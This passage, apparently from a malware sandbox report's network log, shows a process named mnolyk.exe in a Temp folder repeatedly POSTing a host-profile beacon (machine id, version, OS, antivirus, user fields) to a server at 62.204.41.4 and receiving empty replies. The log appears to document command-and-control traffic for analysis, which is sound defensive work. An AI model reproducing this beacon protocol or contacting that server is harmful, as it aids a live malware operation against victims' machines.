                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:51.458302975 CET  873  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      414  192.168.2.7  50142  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:37:51.625961065 CET  874  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:51.692059994 CET  874  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      415  192.168.2.7  50143  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:37:51.857942104 CET  875  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:51.922130108 CET  875  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      416  192.168.2.7  50144  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:37:52.098501921 CET  876  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:52.165503025 CET  876  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      417  192.168.2.7  50145  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:37:52.348177910 CET  877  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:52.411082983 CET | 877 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      418 | 192.168.2.7 | 50146 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:52.585656881 CET | 878 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:52.649820089 CET | 878 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      419 | 192.168.2.7 | 50147 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:52.828887939 CET | 879 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:52.894197941 CET | 879 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      42 | 192.168.2.7 | 49766 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:07.787301064 CET | 474 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:07.852941990 CET | 474 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      420 | 192.168.2.7 | 50148 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:53.070955992 CET | 880 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:53.137356997 CET | 880 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      421 | 192.168.2.7 | 50149 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:53.313477039 CET | 881 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:53.377768040 CET | 881 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      422 | 192.168.2.7 | 50150 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:53.545295000 CET | 882 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:53.607392073 CET | 882 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      423 | 192.168.2.7 | 50151 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:53.780648947 CET | 883 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:53.843168974 CET | 883 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      424 | 192.168.2.7 | 50152 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:54.029428005 CET | 884 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:54.098175049 CET | 884 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      425 | 192.168.2.7 | 50153 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:54.264448881 CET | 885 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:54.327646971 CET | 885 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      426 | 192.168.2.7 | 50154 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:54.498606920 CET | 886 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:54.561449051 CET | 886 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      427 | 192.168.2.7 | 50155 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:54.734216928 CET | 887 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:54.797312021 CET | 887 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      428 | 192.168.2.7 | 50156 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:54.967951059 CET | 888 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:55.031579018 CET | 888 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      429 | 192.168.2.7 | 50157 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:55.206070900 CET | 889 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:55.272998095 CET | 889 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      43 | 192.168.2.7 | 49767 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:08.035706997 CET | 475 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:08.102848053 CET | 475 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      430 | 192.168.2.7 | 50158 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:55.451858997 CET | 890 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:55.515927076 CET | 890 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      431 | 192.168.2.7 | 50159 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:55.686513901 CET | 891 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:55.749275923 CET | 891 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
